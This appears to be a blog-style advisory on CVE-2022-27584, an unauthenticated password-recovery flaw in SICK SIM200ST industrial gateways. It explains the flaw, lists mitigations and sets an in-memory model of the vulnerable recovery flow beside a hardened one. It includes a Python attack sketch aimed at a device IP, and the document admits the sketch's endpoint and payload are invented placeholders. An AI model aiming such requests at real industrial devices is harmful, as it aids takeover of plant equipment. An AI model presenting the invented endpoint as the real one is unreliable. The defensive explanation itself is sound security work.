A significant vulnerability (CVE-2022-27584) was uncovered in the SICK SIM200ST (part number 1080579), an industrial connectivity gateway. The flaw allows an unprivileged remote attacker to gain unauthorized user access by invoking the device's password recovery mechanism. Exploiting it can grant higher-level privileges and compromise the confidentiality, integrity, and availability of the device. All firmware versions up to and including 1.7.0 are affected, and no fix is yet available.
Below you will find a plain-language breakdown of the flaw, an illustrative exploit script, and practical mitigation advice.
What Is SICK SIM200ST?
The SICK SIM200ST is a connectivity gateway used in industrial environments. It lets different machines and sensors communicate on a factory network. Keeping these devices secure is crucial for production continuity and safety.
What’s the Problem?
The SIM200ST includes a “password recovery” mechanism. Normally, this is meant to help authorized users regain access if they forget their credentials. But, in these affected firmware versions, any remote attacker—with no special privileges—can trigger this recovery method and gain access to what the vendor calls a RecoverableUserLevel.
Because the recovered account carries real permissions on the device, an attacker can use it as a foothold to escalate privileges and potentially take over the gateway.
Bottom line: if a SICK SIM200ST is on your network, any host that can reach its network interface can obtain the RecoverableUserLevel account, and the attack is repeatable.
How Does the Exploit Work? (With Code Example)
Attackers reach the password recovery function through the device's network interface; invoking it is enough to be granted the RecoverableUserLevel account, with no prior credentials. The public advisory and the NVD entry do not document the exact request format, so the endpoint path and request body in the example below are illustrative placeholders, not a published proof of concept.
Here is a Python sketch of how an attacker could exercise this flaw (the URL and payload are assumptions):
import requests

# Replace with the IP of your SIM200ST
DEVICE_IP = "192.168.0.100"
# Illustrative path: the advisory does not publish the real recovery endpoint
URL = f"http://{DEVICE_IP}/api/password-recovery"

# Insecure: the recovery request carries no credentials, yet it yields an account
payload = {
    "username": "RecoverableUserLevel"
}

response = requests.post(URL, json=payload, timeout=10)

if response.status_code == 200:
    print("Password recovery initiated!")
    # The body format is device-specific; fall back to raw text if it is not JSON
    try:
        print("Response:", response.json())
    except ValueError:
        print("Response:", response.text)
else:
    print("Request failed:", response.status_code)
The script sends a single unauthenticated request to the recovery function. On a vulnerable device, the response contains what the attacker needs to reset the recoverable account and log in with it, and the request can be repeated at will.
Official References
- SICK Security Advisory – SIM200ST
- NIST NVD Entry for CVE-2022-27584 *(Check for updates)*
- Vendor Downloads & Documentation
Mitigation
A fix is planned, but as of June 2024 no patched firmware has been released. Until one is available, apply these practices:
- Disable device configuration over the network where your deployment allows it, so the recovery mechanism is not reachable remotely (applies to all affected firmware, <=1.7.0; check the device's administration settings).
- Restrict network access to each SIM200ST to the management hosts that need it, and keep the devices off networks reachable from untrusted segments.
- Inventory every SIM200ST in your environment and confirm none is exposed beyond its production network.
- Watch the SICK security advisories and the NVD entry for a patched firmware release.
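The following example is added here and is not SICK's code or a published proof of concept. It models, in plain Python and entirely in memory, the design flaw described in the exploit section above and two of the mitigations listed: a recovery flow in which merely naming an account hands out a working password (the class of bug the advisory describes), set beside a hardened flow that proves possession of an out-of-band recovery secret, binds the code to a one-time challenge, locks the account after repeated failures, and only answers requests from a management subnet. The user database, the secret, the subnet, and the status strings are all constructed for the example.

```python
import hashlib
import hmac
import ipaddress
import secrets

# Constructed in-memory stand-in for the device's user database. The
# password is one the attacker does not know; nothing here contacts a
# real SIM200ST.
DEVICE_USERS = {"maintenance": {"password": "initial-password-unknown-to-attacker"}}

# Assumed management subnet: the only source from which configuration
# (including recovery) is accepted. This stands in for the advisory's
# "disable configuration over the network" remediation.
MANAGEMENT_NET = ipaddress.ip_network("10.10.0.0/24")


def vulnerable_recover(username):
    """Recovery as the flaw describes it: naming a user is enough.

    Any remote caller obtains a fresh, valid password for the account and
    can repeat this as often as they like.
    """
    if username not in DEVICE_USERS:
        return None
    new_password = secrets.token_urlsafe(12)
    DEVICE_USERS[username]["password"] = new_password
    return new_password


def compute_recovery_code(recovery_secret, username, nonce):
    """Code the legitimate owner derives from the out-of-band recovery
    secret (e.g. printed on the device label) for one specific challenge."""
    message = f"{username}:{nonce}".encode()
    return hmac.new(recovery_secret, message, hashlib.sha256).hexdigest()


class HardenedRecovery:
    """Recovery that proves possession of an out-of-band secret, is bound
    to a one-time challenge, is rate limited, and only answers the
    management network."""

    def __init__(self, recovery_secret, max_attempts=3):
        self._secret = recovery_secret
        self._max_attempts = max_attempts
        self._pending = {}   # username -> outstanding challenge nonce
        self._failures = {}  # username -> failed attempts since last success

    def issue_challenge(self, username):
        """Hand out a fresh nonce the owner must bind the recovery code to."""
        nonce = secrets.token_hex(16)
        self._pending[username] = nonce
        return nonce

    def recover(self, username, nonce, code, source_ip):
        """Return (new_password, status); new_password is None on failure."""
        # Network restriction first: hosts outside the management subnet never
        # get to exercise the recovery logic at all.
        if ipaddress.ip_address(source_ip) not in MANAGEMENT_NET:
            return None, "rejected: source outside management network"
        if self._failures.get(username, 0) >= self._max_attempts:
            return None, "rejected: account locked"
        expected_nonce = self._pending.get(username)
        # Unknown user, stale nonce and wrong code all fail identically so the
        # response does not reveal which usernames exist.
        if (username not in DEVICE_USERS or expected_nonce is None
                or not hmac.compare_digest(expected_nonce, nonce)
                or not hmac.compare_digest(
                    compute_recovery_code(self._secret, username, nonce), code)):
            self._failures[username] = self._failures.get(username, 0) + 1
            return None, "rejected: invalid recovery code"
        # Success: consume the challenge so the same code cannot be replayed.
        del self._pending[username]
        self._failures.pop(username, None)
        new_password = secrets.token_urlsafe(12)
        DEVICE_USERS[username]["password"] = new_password
        return new_password, "ok"


if __name__ == "__main__":
    # Vulnerable flow: the attacker knows nothing and still gets a password.
    print("vulnerable flow, attacker:", vulnerable_recover("maintenance"))

    label_secret = b"label-secret-only-owner-has"   # constructed
    device = HardenedRecovery(label_secret)
    nonce = device.issue_challenge("maintenance")
    # Attacker inside the management net but without the secret is refused.
    print("hardened flow, attacker:", device.recover("maintenance", nonce, "0" * 64, "10.10.0.5"))
    # Owner derives the code from the out-of-band secret and succeeds.
    owner_code = compute_recovery_code(label_secret, "maintenance", nonce)
    print("hardened flow, owner:", device.recover("maintenance", nonce, owner_code, "10.10.0.5"))
```

The point of the contrast is that the recovery mechanism itself is not the problem; a recovery path that any network peer can complete without proving anything is. Each check in HardenedRecovery.recover removes one thing the vulnerable flow gives away for free: reachability, unlimited attempts, and an account without proof of ownership.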
Conclusion
CVE-2022-27584 is a repeatable, low-effort flaw that undermines the access controls of SICK SIM200ST industrial gateways. If you operate or manage these devices, act now: identify every exposed SIM200ST, restrict its network access, disable network configuration where you can, and watch for a vendor patch.
Until patched firmware ships, an unrestricted SIM200ST is open to anyone who can reach it.
*For updates, stay tuned to official SICK security advisories and NVD entries.*
Timeline
Published on: 11/01/2022 21:15:00 UTC
Last modified on: 12/16/2022 16:15:00 UTC